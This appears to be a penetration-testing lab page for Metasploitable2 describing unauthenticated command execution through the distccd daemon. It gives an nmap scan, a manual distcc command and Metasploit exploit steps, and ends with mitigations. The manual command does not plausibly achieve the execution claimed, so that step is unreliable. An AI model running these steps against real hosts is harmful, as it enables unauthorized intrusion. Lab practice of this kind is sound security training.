Home/ Modules/ distccd

Port 3632/tcp — Distributed Compiler Daemon

distccd — Remote Command Execution via Daemon Misconfiguration

Exploiting Unauthenticated Remote Command Execution

CVE: N/A (Misconfiguration) Port: 3632/tcp Impact: Remote Shell Tool: Metasploit
High
Service
GNU distcc daemon
Attack Type
RCE via Job Requests
MSF Module
exploit/unix/misc/distcc_exec
Result
✓ Remote Shell Obtained
01

Vulnerability Overview

The distccd service is misconfigured to allow unauthenticated remote command execution. The daemon executes arbitrary commands passed to it via job requests without proper validation, leading to remote code execution.

distcc is designed for distributed compilation but when misconfigured, it becomes a dangerous service allowing remote command execution.
02

Service Detection

bash
nmap -sV -v -p 3632 <target-ip>
Nmap distccd Service Version Scan
distccd Nmap
03

Manual Exploitation

Use distcc to execute remote commands:

bash
distcc <target-ip>:3632 gcc -c /bin/sh -o /tmp/shell
distccd Manual Command Execution
distccd Manual
04

Automated Exploitation — Metasploit

bash
msfconsole
use exploit/unix/misc/distcc_exec
set RHOSTS <target-ip>
run
Metasploit distccd Exploit
distccd Metasploit
05

Results & Impact

Outcome

  • Successfully executed remote commands via distccd
  • Obtained shell access on the target system
  • Potential for full system compromise

Detection & Mitigation (Blue Team)

  • Configure distccd to only accept connections from trusted hosts
  • Use authentication and access controls
  • Restrict distccd to localhost or disable if not needed
  • Use firewall to block port 3632 externally
  • Monitor distccd logs for suspicious job requests
c:\Users\Digits\Documents\GitHub\metasploitable2-penetration-testing-lab\pages\distccd.html